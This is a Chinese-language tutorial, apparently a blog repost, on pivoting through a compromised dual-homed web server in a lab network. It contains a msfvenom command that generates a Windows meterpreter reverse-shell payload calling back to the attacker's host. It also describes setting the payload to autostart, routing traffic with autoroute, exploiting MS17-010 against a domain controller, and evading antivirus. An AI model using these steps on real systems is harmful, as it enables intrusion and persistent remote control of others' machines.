1. 程式人生 > 其它 >msf生成後門實戰漫遊內網

msf生成後門實戰漫遊內網

前言:當我們在滲透當中首先拿到webshell許可權,進一步提權滲透,獲得內網的主機,假設在這裡我們獲取了具有雙網絡卡的web伺服器,我們的目的是通過這臺web伺服器,進行內網漫遊,獲取內網中其他主機的系統shell,以此達到漫遊的目的。

1.實驗環境

web伺服器:192.168.4.129 1.1.1.12

域控伺服器: 1.1.1.11

防火牆: 1.1.1.1

黑客(kali):192.168.4.136

2.我們獲得webshell許可權後,一般會上傳遠端木馬,進行反向連線(內網與外網之間儘可能用反向連線,因為防火牆前一般對出去的流量監視的比較弱)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.4.136 LPORT=2222 -f exe -o payload.exe

這裡貼上引數註釋:

將上面生成的木馬程式,通過web端上傳到目標伺服器上,然後將其新增到系統自啟項中,使其執行

我們此時需要在攻擊端上設定相同的payload引數,讓受害者主動連線攻擊端

我們執行之後,此時已經獲得了受害者的系統shell,我們要通過新增路由的方式,進入內網,

run autoroute -s 1.1.1.0/24

此時就可以將掃描的流量通過已經獲取許可權的系統system1流向內網任意一臺主機,我們掃出來了445埠,如果系統沒有及時打補丁,那麼很可能系統存在永恆之藍漏洞

下圖可以看出流量的確是通過1.1.1.12流向1.1.1.11的

接下對內網的主機進行掃描,看是否存在永恆之藍(ms17-010)漏洞,結果顯示存在ms17-010漏洞可以利用

新增漏洞利用模組

配置相關引數 ,獲取到目標主機的系統shell

我們可以通過sessions -i來檢視獲取到的系統shell許可權,總共獲取了兩個,按照這個思路同樣也可以繼續滲透

我們上傳的木馬一定要進行免殺處理,不然上傳的木馬會被目標伺服器的防毒軟體殺死,之前有寫過免殺的,可以檢視